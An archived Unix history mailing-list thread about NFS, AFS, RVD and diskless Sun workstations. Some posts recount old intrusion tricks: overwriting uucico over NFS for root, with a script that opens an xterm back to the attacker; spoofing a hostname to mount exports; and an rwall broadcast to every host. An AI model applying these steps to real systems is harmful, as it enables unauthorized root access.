The Unix Heritage Society mailing list
* [TUHS] RFS was: Re: UNIX of choice these days?
@ 2017-09-28 12:53 Noel Chiappa
  2017-09-28 14:09 ` Theodore Ts'o
  0 siblings, 1 reply; 48+ messages in thread
From: Noel Chiappa @ 2017-09-28 12:53 UTC (permalink / raw)


    > From: Theodore Ts'o

    > when a file was truncated and then rewritten, and "truncate this file"
    > packet got reordered and got received after the "here's the new 4k of
    > contents of the file", Hilarity Ensued.

This sounds _exactly_ like a bad bug found in the RVD protocol (Remote Virtual
Disk - a simple block device emulator). Disks kept suffering bit rot (damage
to the inodes, IIRC). After much suffering and pain trying to debug it (with
that many disk writes, how do you figure out which one is the problem?), it
was finally found (IIRC, not by someone reasoning it out; they actually
caught it in the act). Turned out (I'm pretty sure my memory of the bug is
correct) that if you had two writes of the same block in quick succession,
and the second was lost, and the first one's ack was delayed Just Enough...

They had an unused 'hint' (I think) field in the protocol, so they recycled
that as a sequence number, letting them tell acks apart.
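To make the failure mode concrete, here is a toy model (not the actual RVD code; the block numbers and field names are invented) of why an ack that names only the block is ambiguous, and why a per-write sequence number fixes it:

```python
# Toy model of the RVD ack bug: two writes of the same block in quick
# succession, the second lost on the wire, the first one's ack delayed.
# If acks name only the block, the client credits the stale ack to the
# newer write and never retransmits it, leaving stale data on disk.

def simulate(acks_carry_seq):
    disk = {}
    pending = []          # outstanding client writes: (seq, block, data)

    # Write #1 reaches the server, but its ack is delayed in the network.
    pending.append((1, 7, "old"))
    disk[7] = "old"
    delayed_ack = {"block": 7, "seq": 1}

    # Write #2 (same block) is lost: no server state, no ack.
    pending.append((2, 7, "new"))

    # The delayed ack for write #1 finally arrives.
    if acks_carry_seq:
        # The ack identifies exactly one write; only that one is cleared.
        pending = [w for w in pending if w[0] != delayed_ack["seq"]]
    else:
        # The ack names only the block, so the client clears everything
        # outstanding for that block -- including the lost write #2.
        pending = [w for w in pending if w[1] != delayed_ack["block"]]

    # Whatever is still pending gets retransmitted and lands on disk.
    for _seq, block, data in pending:
        disk[block] = data
    return disk[7]

# simulate(acks_carry_seq=True)  -> "new" (write #2 is retransmitted)
# simulate(acks_carry_seq=False) -> "old" (silent stale data, the "bit rot")
```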

      Noel



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 12:53 [TUHS] RFS was: Re: UNIX of choice these days? Noel Chiappa
@ 2017-09-28 14:09 ` Theodore Ts'o
  2017-09-28 14:35   ` Clem Cole
  0 siblings, 1 reply; 48+ messages in thread
From: Theodore Ts'o @ 2017-09-28 14:09 UTC (permalink / raw)


On Thu, Sep 28, 2017 at 08:53:54AM -0400, Noel Chiappa wrote:
>     > From: Theodore Ts'o
> 
>     > when a file was truncated and then rewritten, and "truncate this file"
>     > packet got reordered and got received after the "here's the new 4k of
>     > contents of the file", Hilarity Ensued.
> 
> This sounds _exactly_ like a bad bug found in the RVD protocol (Remote Virtual
> Disk - a simple block device emulator). Disks kept suffering bit rot (damage
> to the inodes, IIRC). After much suffering and pain trying to debug it (with
> that many disk writes, how do you figure out which one is the problem?), it
> was finally found (IIRC, not by someone reasoning it out; they actually
> caught it in the act). Turned out (I'm pretty sure my memory of the bug is
> correct) that if you had two writes of the same block in quick succession,
> and the second was lost, and the first one's ack was delayed Just Enough...

At least at Project Athena, we only used RVD as a way to do read-only
dissemination of system software, since RVD couldn't provide any kind
of file sharing, which was important at Athena.  So we used NFS
initially, and later on, transitioned to the Andrew File System (AFS).

The fact that with AFS you could do a live migration of a user's home
directory, in the middle of the day, to replace a drive that was showing
early signs of failure, meant that all of our ops people infinitely
preferred AFS to NFS.  NFS meant coming in late at night, after scheduling
downtime, to replace a failing disk, whereas with AFS there was nothing but
a 30-second hiccup while the volume was swept from one server to another.
AFS was referred to as "crack cocaine": once ops people had a sniff of it,
they never wanted to go back to NFS.

						- Ted



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 14:09 ` Theodore Ts'o
@ 2017-09-28 14:35   ` Clem Cole
  0 siblings, 0 replies; 48+ messages in thread
From: Clem Cole @ 2017-09-28 14:35 UTC (permalink / raw)



On Thu, Sep 28, 2017 at 10:09 AM, Theodore Ts'o <tytso at mit.edu> wrote:

> Once ops people had a sniff of AFS, they never wanted to go
> back to NFS.
>
Amen... and once you had switched to a token manager or DLM under the covers
to do the locking, you could never understand why anyone wouldn't do it
properly.

Still, the brilliance of NFS was its ease of getting out there and getting
people addicted to using a distributed FS.  That was what Sun nailed.

And just like communism had to add 'work incentives' -- NFS added state :-)

Clem


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 22:11                                       ` Don Hopkins
@ 2017-09-29 22:21                                         ` Don Hopkins
  0 siblings, 0 replies; 48+ messages in thread
From: Don Hopkins @ 2017-09-29 22:21 UTC (permalink / raw)



There were some interesting followups from Milo Medin, Jordan Hubbard, and
Dennis Perry on the h_g/tcp-ip mailing lists:

From: Milo S. Medin <medin@orion.arpa>

Actually, Dennis Perry is the head of DARPA/IPTO, not a pencil pusher
in the IG's office.  IPTO is the part of DARPA that deals with all
CS issues (including funding for ARPANET, BSD, MACH, SDINET, etc...).
Calling him part of the IG's office on the TCP/IP list probably didn't
win you any favors.  Coincidentally I was at a meeting at the Pentagon
last Thursday that Dennis was at, along with Mike Corrigan (the man
at DoD/OSD responsible for all of DDN), and a couple other such types
discussing Internet management issues, when your little incident
came up.  Dennis was absolutely livid, and I recall him saying something
about shutting off UCB's PSN ports if this happened again.  There were
also reports about the DCA management types really putting on the heat
about turning on Mailbridge filtering now and not after the buttergates
are deployed.  I don't know if Mike St. Johns and company can hold them
off much longer.  Sigh...  Mike Corrigan mentioned that this was the sort
of thing that gets networks shut off.  You really pissed off the wrong
people with this move!

Dennis also called up some VP at SUN and demanded this hole
be patched in the next release.  People generally pay attention
to such people.

From: Jordan K. Hubbard <jkh@violet.berkeley.edu>

Well, I hope Sun patches the holes, Milo. I'm sorry that certain people chose
to react as strongly as they did in our esteemed government offices, but
I am glad that it raised enough fuss to possibly get the problem fixed. No
data was destroyed, lost, or infiltrated, but some people got a whack on the
side of the head for leaving the back door open. I'm not sure I can say that
I'm all that sorry that this happened. rwall is certainly going to change on
my machines, I can only hope that people concerned about being rwall'd over
the net will tighten up their RPC. Those that don't care, should at least be
aware of it.


From: Dennis G. Perry <PERRY@vax.darpa.mil>

Jordan, you are right in your assumptions that people will get annoyed
that what happened was allowed to happen.

By the way, I am the program manager of the Arpanet in the Information
Science and Technology Office of DARPA, located in Rosslyn (Arlington), not
the Pentagon.

I would like suggestions as to what you, or anyone else, think should be
done to prevent such occurrences in the future.  There are many drastic
choices one could make.  Is there a reasonable one?  Perhaps someone
from Sun could volunteer what their action will be in light of this
revelation.  I certainly hope that the community can come up with a good
solution, because I know that when the problem gets solved from the top,
the solutions will reflect their concerns.

Think about this situation and I think you will all agree that this is
a serious problem that could cripple the Arpanet and any other net that
lets things like this happen without control.

dennis
———

From: Jordan K. Hubbard <jkh@violet.berkeley.edu>

Dennis,

Sorry about the mixup on your location and position within DARPA. I got
the news of your call to Richard Olson second hand, and I guess details
got muddled along the way. I think the best solution to this problem (and
other problems of this nature) is to tighten up the receiving ends. Assuming
that the network is basically hostile seems safer than assuming that it's
benign when deciding which services to offer.

I don't know what Sun has in mind for Secure RPC, or whether they will move
the release date for 4.0 (which presumably incorporates these features)
closer, but I will be changing rwalld here at Berkeley to use a new YP
database containing a list of "trusted" hosts. If it's possible to change
RPC itself, without massive performance degradation, I may do that as well.

My primary concern is that people understand where and why unix/network
security holes exist. I've gotten a few messages from people saying that
they would consider it a bug if rwall *didn't* perform in this manner, and
that hampering their ability to communicate with the rest of the network
would be against the spirit of all it stands for. There is, of course, the
opposite camp which feels that IMP's should only forward packets from hosts
registered with the NIC. I think that either point of view has its pros and
cons, but that it should be up to the users to make a choice. If they wish
to expose themselves to potential annoyance in exchange for being able to,
uh, communicate more freely, then so be it. If the opposite is true, then
they can take appropriate action. At least an informed choice will have been
made.

                Yours for a secure, but usable, network.

From: Dennis G. Perry <PERRY@vax.darpa.mil>

Jordan, thanks for the note.  I agree that we should discover and FIX holes
found in the system.  But at the same time, we don't want to have to
shut the thing down until such a fix can be made.  Misuse of the system
gets us all in a lot of trouble.  The Arpanet has succeeded because of
its self-policing community.  If this type of potential for disruption
gets used by very many people, I guarantee that none of us will like the
solution or fix proposed.

dennis
———




^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 21:24                                     ` Arthur Krewat
@ 2017-09-29 22:11                                       ` Don Hopkins
  2017-09-29 22:21                                         ` Don Hopkins
  0 siblings, 1 reply; 48+ messages in thread
From: Don Hopkins @ 2017-09-29 22:11 UTC (permalink / raw)



Sun’s YP was a piece of work. 

That name always sounded to me like a brand of moist pop-up baby bottom wipes. 

Baby made a poopie, and now we need a YP!

Who remembers Jordan Hubbard’s notorious rwall incident? 

https://en.wikipedia.org/wiki/Jordan_Hubbard#rwall_incident

http://catless.ncl.ac.uk/Risks/4.73.html#subj10.1

He put this line into /etc/netgroup:

universal (,,)

Then he did an rwall to that group…

I was on a Sun at umd at the time, and received a copy! 

It also scribbled all over the Interleaf windows of Dennis Perry (the Inspector General of the ARPAnet, in the Pentagon).
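For anyone who has forgotten the netgroup format: each member of a netgroup is a (host, user, domain) triple, and an empty field acts as a wildcard, so `(,,)` matches every host, every user, and every domain. A sketch (the second group name and its hosts are invented for contrast):

```
# /etc/netgroup -- members are (host,user,domain) triples;
# an empty field matches anything.
universal   (,,)                   # every host, every user, every domain
trusted     (mach1,,) (mach2,,)    # only hosts mach1 and mach2
```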

-Don



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 18:40                                   ` Don Hopkins
  2017-09-29 19:03                                     ` Larry McVoy
@ 2017-09-29 21:24                                     ` Arthur Krewat
  2017-09-29 22:11                                       ` Don Hopkins
  1 sibling, 1 reply; 48+ messages in thread
From: Arthur Krewat @ 2017-09-29 21:24 UTC (permalink / raw)



There was also a horrible bit of backdoor-ism that was exploitable with 
NFS on SunOS - it was there in at least 4.1.3, but I imagine it had been 
around for a long time.

If the /usr filesystem was exported, and you were either a "known host" 
or it was exported to (everyone) - and yes, there were a LOT of people 
who did this...

Mount it locally, become root, su - uucp, and change the mode on 
/usr/lib/uucp/uucico (which was owned by uucp) from setuid to writable. 
Overwrite it with your binary or script of choice.

Telnet to the exploited host, and /usr/lib/uucp/uucico was executed as root.

I usually used:

#!/bin/sh
/usr/openwin/bin/xterm -display <myhost>:0

I used this on a WAN back in the '90s - actually to reset a lost root 
password for someone, but also to poke around sometimes ;)

I don't know why people exported /usr - but they did it a lot.

On 9/29/2017 2:40 PM, Don Hopkins wrote:
> I was able to nfs-mount a directory on one of cs.cmu.edu's servers from sun.com’s network with no problem. Ron may remember me warning him about that!
>   
> -Don
>
>
>



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 19:19                                 ` Dan Cross
  2017-09-29 19:22                                   ` Larry McVoy
@ 2017-09-29 20:52                                   ` Jon Forrest
  1 sibling, 0 replies; 48+ messages in thread
From: Jon Forrest @ 2017-09-29 20:52 UTC (permalink / raw)




On 9/29/2017 12:19 PM, Dan Cross wrote:

> We had a setup on Sun's running SunOS 4.1.x that I actually really
> liked; I believe it was referred to as "dataless".
[...]
> It was a really nice, comfortable system. Of course, it wouldn't fly
> in this day and age for security and other reasons but back in the
> early 90s it was great.

I agree 100%. I created such an environment on DEC's OSF/1 running
on Alphas (cf. "A Dataless Environment in OSF/1", Digital Systems
Journal, Nov. 1994) when I worked in the CS department at
UC Berkeley. Plus, the CS department itself ran a big Auspex
server that made it possible to create an ad-hoc dataless environment.

At the time, a 600MB disk drive was considered large. Putting all
the read-only stuff on a server made lots of sense. Of course, it
required a reasonably fast network connection, but with 100Mb/s networks
starting to get cheap at that time, that wasn't a big deal.

Jon Forrest
UC Berkeley (ret.)


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 19:19                                 ` Dan Cross
@ 2017-09-29 19:22                                   ` Larry McVoy
  2017-09-29 20:52                                   ` Jon Forrest
  1 sibling, 0 replies; 48+ messages in thread
From: Larry McVoy @ 2017-09-29 19:22 UTC (permalink / raw)


On Fri, Sep 29, 2017 at 03:19:19PM -0400, Dan Cross wrote:
> On Thu, Sep 28, 2017 at 6:20 PM, Larry McVoy <lm at mcvoy.com> wrote:
> > I dunno why all the hating on diskless.  They actually work, I used the
> > heck out of them.  For kernel work, stacking one on top of the other,
> > the test machine being diskless, was a cheap way to get a setup.
> >
> > Sure, disk was better and if your work load was write heavy then they
> > sucked (*), but for testing, for editing, that sort of thing, they were
> > fine.
> 
> We had a setup on Sun's running SunOS 4.1.x that I actually really
> liked; I believe it was referred to as "dataless". The root
> filesystem, /tmp and swap were local, along with scratch space on an
> arbitrarily named filesystem (I think we mounted that on /scratch, but
> I can't remember the details at this point). The difference between
> /tmp and /scratch was that the latter persisted across reboots and we
> backed it up. /usr, /usr/local came from a fileserver on the local
> ethernet and /home was automounted. Users didn't have local root
> access, and we kept / pretty well updated using rdist and some
> home-grown scripts; basically, we could throw / away at any time on
> any machine and rebuild it without losing much. 

That's how Sun ran their engineering setup by default.  Your home 
directory was on some file server and that's where you put long 
lived stuff or stuff you wanted other people to see.

The local disks were for performance and were optional.  You could do
the same thing diskless, and admins were perfectly happy with that.

I did more or less the same thing for 20 years at BitMover, worked
great.


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 22:20                               ` Larry McVoy
                                                   ` (2 preceding siblings ...)
  2017-09-29 15:22                                 ` George Ross
@ 2017-09-29 19:19                                 ` Dan Cross
  2017-09-29 19:22                                   ` Larry McVoy
  2017-09-29 20:52                                   ` Jon Forrest
  3 siblings, 2 replies; 48+ messages in thread
From: Dan Cross @ 2017-09-29 19:19 UTC (permalink / raw)


On Thu, Sep 28, 2017 at 6:20 PM, Larry McVoy <lm at mcvoy.com> wrote:
> I dunno why all the hating on diskless.  They actually work, I used the
> heck out of them.  For kernel work, stacking one on top of the other,
> the test machine being diskless, was a cheap way to get a setup.
>
> Sure, disk was better and if your work load was write heavy then they
> sucked (*), but for testing, for editing, that sort of thing, they were
> fine.

We had a setup on Sun's running SunOS 4.1.x that I actually really
liked; I believe it was referred to as "dataless". The root
filesystem, /tmp and swap were local, along with scratch space on an
arbitrarily named filesystem (I think we mounted that on /scratch, but
I can't remember the details at this point). The difference between
/tmp and /scratch was that the latter persisted across reboots and we
backed it up. /usr, /usr/local came from a fileserver on the local
ethernet and /home was automounted. Users didn't have local root
access, and we kept / pretty well updated using rdist and some
home-grown scripts; basically, we could throw / away at any time on
any machine and rebuild it without losing much. Since all the
administrative data like passwd, group et al all came from NIS it was
almost the best of both worlds: the consistency and central management
of diskless machines and the performance of having local disk. When
the user wanted to do something temporary and IO intensive s/he just
did it in /scratch or /tmp; everything else lived on the file server.
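A hedged sketch of what such a "dataless" client's /etc/fstab might have looked like (the device names, server name, and export paths are invented; the split between local and remote filesystems is as described above):

```
# Local: root, swap, and scratch; /tmp lived on the local root disk.
/dev/sd0a  /         4.2  rw  1 1
/dev/sd0b  swap      swap rw  0 0
/dev/sd0g  /scratch  4.2  rw  1 2
# From the file server: read-mostly system software; /home automounted.
server:/export/usr        /usr        nfs  ro  0 0
server:/export/usr.local  /usr/local  nfs  ro  0 0
```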

We could deploy a new machine by netbooting it and dd'ing an image
onto the disk. A script ran the first time it booted up that made
whatever small modifications were necessary to files in /etc (this was
before jumpstart and officially sanctioned network install systems)
and away one went. It took about 10 minutes before the user could take
over and get to work.

It was a really nice, comfortable system. Of course, it wouldn't fly
in this day and age for security and other reasons but back in the
early 90s it was great. I didn't find a system I liked as much until I
met plan9. In many ways, the environments we're on these days feel like
a regression.

        - Dan C.


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 18:40                                   ` Don Hopkins
@ 2017-09-29 19:03                                     ` Larry McVoy
  2017-09-29 21:24                                     ` Arthur Krewat
  1 sibling, 0 replies; 48+ messages in thread
From: Larry McVoy @ 2017-09-29 19:03 UTC (permalink / raw)


On Fri, Sep 29, 2017 at 08:40:41PM +0200, Don Hopkins wrote:
> On 29 Sep 2017, at 17:22, George Ross <gdmr at inf.ed.ac.uk> wrote:
> 
> > I dunno why all the hating on diskless.  They actually work, I used the
> > heck out of them.
> 
> The issue we (initially) had with Suns wasn't the stateful/stateless debate,
> or indeed that they were discless.  It was that horrible "UNIX
> authentication" that NFS used.

Yeah, that was a joke (in poor taste at that).


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 16:46                                   ` Grant Taylor
  2017-09-29 17:02                                     ` Kurt H Maier
@ 2017-09-29 18:47                                     ` Andreas Kusalananda Kähäri
  1 sibling, 0 replies; 48+ messages in thread
From: Andreas Kusalananda Kähäri @ 2017-09-29 18:47 UTC (permalink / raw)



On Fri, Sep 29, 2017 at 10:46:16AM -0600, Grant Taylor wrote:
> On 09/29/2017 02:59 AM, Andreas Kusalananda Kähäri wrote:
> > My main work setup today is actually a diskless (X11-less) OpenBSD
> > system.  It's just something I set up in a VM environment to learn how
> > to do it (I'm on a work laptop running Windows 10, as I need Windows for
> > some few work-related tasks), but it works just fine and I have no
> > reason to change it.  For one thing, it makes backups easier as they can
> > run locally on the server.
> 
> I think you're the first person that I've seen say "I am" and not "I used
> to" regarding diskless.
> 
> Can I ask for a high level overview of your config?
> 
> I am guessing dhcp and / or bootp, combined with tftp for kernel image, and
> NFS for root.

Nothing fancy.  OpenBSD's dhcpd on a server tells the client to pick up
pxeboot (the 2nd-stage bootstrap) over tftp from my file server.  pxeboot
then loads the kernel over tftp.  The bootparamd daemon on the fileserver
provides info to the client regarding its root directory and swap file,
and the client mounts these over NFS.

It follows http://man.openbsd.org/diskless closely.
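A minimal sketch of the server side of that arrangement (hostnames, MAC address, and IP addresses are invented; the diskless page cited above is the authoritative recipe):

```
# /etc/dhcpd.conf on the dhcp server: point the client at pxeboot.
host client0 {
        hardware ethernet 00:00:5e:00:53:01;
        fixed-address 192.0.2.10;
        next-server 192.0.2.1;      # the tftp server
        filename "pxeboot";
}

# /etc/bootparams on the file server: where root and swap live.
client0 root=fileserver:/exports/client0/root swap=fileserver:/exports/client0/swap
```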



-- 
Andreas Kusalananda Kähäri,
National Bioinformatics Infrastructure Sweden (NBIS),
Uppsala University, Sweden.


^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 15:22                                 ` George Ross
@ 2017-09-29 18:40                                   ` Don Hopkins
  2017-09-29 19:03                                     ` Larry McVoy
  2017-09-29 21:24                                     ` Arthur Krewat
  0 siblings, 2 replies; 48+ messages in thread
From: Don Hopkins @ 2017-09-29 18:40 UTC (permalink / raw)



On 29 Sep 2017, at 17:22, George Ross <gdmr at inf.ed.ac.uk> wrote:

> > I dunno why all the hating on diskless.  They actually work, I used the
> > heck out of them.
> 
> The issue we (initially) had with Suns wasn't the stateful/stateless debate,
> or indeed that they were discless.  It was that horrible "UNIX
> authentication" that NFS used.

When I was a summer intern at Sun in ’87, it was common knowledge among the staff that anyone could find out what hosts an NFS file server trusted by using tftp, which was installed by default, and anonymously grabbing /etc/exports (or guessing hostnames if you can’t get the definitive list). 

Then you just go “hostname trusted-hostname ; mount -t nfs server:/dir ; hostname original-hostname” to mount that file system.

That’s right: the NFS server TRUSTED the NFS client to tell it what it felt like its hostname should be at that particular instant in time!!! If the name the client sent in the parameter to the mount rpc call was listed in /etc/exports, then the server returned a file handle to the client for it to use from then on, even after changing its hostname back! 

I was able to nfs-mount a directory on one of cs.cmu.edu's servers from sun.com’s network with no problem. Ron may remember me warning him about that! 
 
-Don



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 17:02                                     ` Kurt H Maier
  2017-09-29 17:27                                       ` Pete Wright
@ 2017-09-29 18:11                                       ` Grant Taylor
  1 sibling, 0 replies; 48+ messages in thread
From: Grant Taylor @ 2017-09-29 18:11 UTC (permalink / raw)


On 09/29/2017 11:02 AM, Kurt H Maier wrote:
> I run linux workstations and a few supercomputers by PXE booting via 
> DHCP, serving a kernel and initrd over tftp, then having init download a 
> rootfs tarball, which gets extracted to a ramdisk.  switch_root(8) makes 
> it easy.  xCAT automates it.

Thank you for the high level overview.

I'll go do my homework.



-- 
Grant. . . .
unix || die



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 17:02                                     ` Kurt H Maier
@ 2017-09-29 17:27                                       ` Pete Wright
  2017-09-29 18:11                                       ` Grant Taylor
  1 sibling, 0 replies; 48+ messages in thread
From: Pete Wright @ 2017-09-29 17:27 UTC (permalink / raw)





On 09/29/2017 10:02, Kurt H Maier wrote:
> On Fri, Sep 29, 2017 at 10:46:16AM -0600, Grant Taylor wrote:
>> I am guessing dhcp and / or bootp, combined with tftp for kernel
>> image, and NFS for root.
>            
> I run linux workstations and a few supercomputers by PXE booting via
> DHCP, serving a kernel and initrd over tftp, then having init download a
> rootfs tarball, which gets extracted to a ramdisk.  switch_root(8) makes
> it easy.  xCAT automates it.

I had a similar setup at a large special effects studio I used to work at.

We were trying to solve NFSv3 contention issues - especially with large 
directory trees creating tons of metadata requests on Linux (an issue with 
client-side caching IIRC) - so we experimented with using UnionFS to allow 
writes to pass through to local disk.  It was mostly intermediary 
data, and initial testing was promising, in that it alleviated the load 
on our filers and seemed to speed up some rendering processes.

I had left before it made it to wide deployment - but it is something 
I've kept in my toolbox since then as an option.

-pete

-- 
Pete Wright
pete at nomadlogic.org
@nomadlogicLA



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29 16:46                                   ` Grant Taylor
@ 2017-09-29 17:02                                     ` Kurt H Maier
  2017-09-29 17:27                                       ` Pete Wright
  2017-09-29 18:11                                       ` Grant Taylor
  2017-09-29 18:47                                     ` Andreas Kusalananda Kähäri
  1 sibling, 2 replies; 48+ messages in thread
From: Kurt H Maier @ 2017-09-29 17:02 UTC (permalink / raw)


On Fri, Sep 29, 2017 at 10:46:16AM -0600, Grant Taylor wrote:
>
> I am guessing dhcp and / or bootp, combined with tftp for kernel
> image, and NFS for root.
          
I run linux workstations and a few supercomputers by PXE booting via    
DHCP, serving a kernel and initrd over tftp, then having init download a
rootfs tarball, which gets extracted to a ramdisk.  switch_root(8) makes
it easy.  xCAT automates it.
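The boot sequence described above might look roughly like this inside the initrd's init (the tmpfs size, paths, and boot-server URL are invented; xCAT generates the real thing):

```sh
#!/bin/sh
# Sketch: fetch a rootfs tarball into a ramdisk and pivot into it.
mount -t tmpfs -o size=8G tmpfs /newroot
wget -q -O - http://boot-server/images/rootfs.tar.gz | tar xz -C /newroot
# switch_root(8) deletes the initramfs contents, chroots into
# /newroot, and execs the real init from there.
exec switch_root /newroot /sbin/init
```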

       
khm



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
  2017-09-29 14:20                                   ` Clem Cole
@ 2017-09-29 16:46                                   ` Grant Taylor
  2017-09-29 17:02                                     ` Kurt H Maier
  2017-09-29 18:47                                     ` Andreas Kusalananda Kähäri
  1 sibling, 2 replies; 48+ messages in thread
From: Grant Taylor @ 2017-09-29 16:46 UTC (permalink / raw)



On 09/29/2017 02:59 AM, Andreas Kusalananda Kähäri wrote:
> My main work setup today is actually a diskless (X11-less) OpenBSD 
> system.  It's just something I set up in a VM environment to learn how 
> to do it (I'm on a work laptop running Windows 10, as I need Windows 
> for some few work-related tasks), but it works just fine and I have no 
> reason to change it.  For one thing, it makes backups easier as they can 
> run locally on the server.

I think you're the first person that I've seen say "I am" and not "I 
used to" regarding diskless.

Can I ask for a high level overview of your config?

I am guessing dhcp and / or bootp, combined with tftp for kernel image, 
and NFS for root.

> OpenBSD has this "dpb" thing ("distributed ports builder", 
> /usr/ports/infrastructure/bin/dpb, http://man.openbsd.org/dpb) that 
> does distributed building of 3rd-party packages.  It does exactly this, 
> sharing the sources over NFS.

Interesting.



-- 
Grant. . . .
unix || die



^ permalink raw reply	[flat|nested] 48+ messages in thread

* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 22:20                               ` Larry McVoy
  2017-09-29  2:23                                 ` Kevin Bowling
  2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
@ 2017-09-29 15:22                                 ` George Ross
  2017-09-29 18:40                                   ` Don Hopkins
  2017-09-29 19:19                                 ` Dan Cross
  3 siblings, 1 reply; 48+ messages in thread
From: George Ross @ 2017-09-29 15:22 UTC (permalink / raw)


> I dunno why all the hating on diskless.  They actually work, I used the
> heck out of them.

The issue we (initially) had with Suns wasn't the stateful/stateless debate,
or indeed that they were discless.  It was that horrible "UNIX
authentication" that NFS used.

We had been using discless "workstations" and fileservers since around the
late '70s / early '80s, basically ever since we discovered that virtual
DECtapes were a whole lot faster than the real thing.  Our "filestores"
didn't trust their clients -- they did the authentication themselves -- so
we could let the students loose doing bare-metal practicals without having
to worry about them breaking in.  That model didn't work for us with NFS.

However, Sun were keen to sell us kit (and DEC didn't seem to be), and they 
could sell us things for less than we could build them ourselves, so we 
eventually ended up with a couple of hundred or so of the things.  And they 
swapped like mad and thrashed the network into the ground.

We split subnets, and split subnets (and had some interesting amd maps as a 
result of trying to keep traffic local) and eventually ended up with so 
many that we couldn't run them all through all the offices as the cable 
bundle was too big, which was a nightmare for the admin staff trying to 
allocate people to desks.  Twisted pair, and then switches, saved us from 
that problem!

(We also had an X-terminal lab for a while, with a couple of beefy Suns as 
CPU servers.  That had its own, different, contention issues.  We learned 
from that not to arrange things in neat blocks, as the students would come 
in after lectures and go for the first free machine nearest the door, so 
using the naive approach we could end up with one CPU server being totally
overloaded and the other practically idle.)

Now everything is a PC with a ginormous disc, and the contention has moved 
to CPU cores and GPUs.  The more you throw at it the more the academics 
will come up with some way to saturate the thing...

(<http://history.dcs.ed.ac.uk/archive/os/APM-filestore/FS.1976/> for my 
rewrite of the original Interdata filestore code, btw, and 
<http://history.dcs.ed.ac.uk/archive/docs/dcs-inf-network-history.pdf> for 
a bit more on our network history.  There was also a filestore version that
ran on VMS and served files from that out to the network, but I haven't
been able to get a copy of that back off tape yet.)
-- 
George D M Ross MSc PhD CEng MBCS CITP
University of Edinburgh, School of Informatics,
Appleton Tower, 11 Crichton Street, Edinburgh, Scotland, EH8 9LE
Mail: gdmr at inf.ed.ac.uk   Voice: 0131 650 5147 
PGP: 1024D/AD758CC5  B91E D430 1E0D 5883 EF6A  426C B676 5C2B AD75 8CC5

The University of Edinburgh is a charitable body, registered in
Scotland, with registration number SC005336.





* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
@ 2017-09-29 14:20                                   ` Clem Cole
  2017-09-29 16:46                                   ` Grant Taylor
  1 sibling, 0 replies; 48+ messages in thread
From: Clem Cole @ 2017-09-29 14:20 UTC (permalink / raw)



On Fri, Sep 29, 2017 at 4:59 AM, Andreas Kusalananda Kähäri <
andreas.kahari at icm.uu.se> wrote:
>
> My main work setup today is actually a diskless (X11-less) OpenBSD
> system.

Please be careful when you compare a technology choice of today with
yesterday.

What Larry and I were arguing about diskless was based on the Masscomp
WS-500 vs Sun-3 vs Apollo systems of the same vintage.   Pricing on the 3
systems (with a disk) and the same amount of memory (all three used the
same 16 MHz 68020 processor) was $9.5K for the WS-500, $10K for the Apollo
and $11.5K for the Sun.   But if you dropped the disk out of the system, the
Sun dropped to $7K and the Apollo to $6.5K (Masscomp could not, because I
refused to build it, as I thought it was a crappy idea for a real-time system).

FYI:  Sun charged another $5K for an add-in disk unit, although on
the aftermarket you could get one that worked fine for about $4K [which is
what we did to all the Stellar development systems when we discovered that
they did not work as well as we had thought].

IIRC the memory was 4M (it might have been a little more, but not too
much).    The disk itself was on the order of 100M in size and was ST-506
based, with an ST-506 to SCSI converter.   I'm trying to remember when
the 200-500M 5.25in ST-506 disk showed up, but I think it was a little after
that.

The point is the cost of the HW and configuration of the HW for all intents
and purposes was the same between the three systems.
The difference really was the software.    Each had made different
choices... given their chosen markets.

Today, the HW allows different choices.  Memory configurations alone make
diskless much more interesting.   Ignoring a local cache, if you ran a RAM
file system on a system like the one I just described, it took up 1/4 of
the memory you had.

Today, Linux and *BSD use 'ramFS' just to boot the OS - which makes perfect
sense, *today*.

On the other hand, back in the day, on the Masscomp, we turned the cache
off and 'borrowed it' as scratch-pad RAM for the boot process (UNIX turned
it on as part of turning on the MMU) because memory was at such a premium
and it might not be working.    *Diskless was a cost choice in the old days.*
Today the price of the disk (SSD) per bit is so small that the 'cost'
has more to do with power and space in the case, and possibly portability,
than with the price of the bits themselves.   In theory a 'Chromebook'-style
system of today needs no permanent local storage.



* [TUHS] RFS was: Re: UNIX of choice these days?
  2017-09-28 22:20                               ` Larry McVoy
  2017-09-29  2:23                                 ` Kevin Bowling
@ 2017-09-29  8:59                                 ` Andreas Kusalananda Kähäri
  2017-09-29 14:20                                   ` Clem Cole
  2017-09-29 16:46                                   ` Grant Taylor
  2017-09-29 15:22                                 ` George Ross
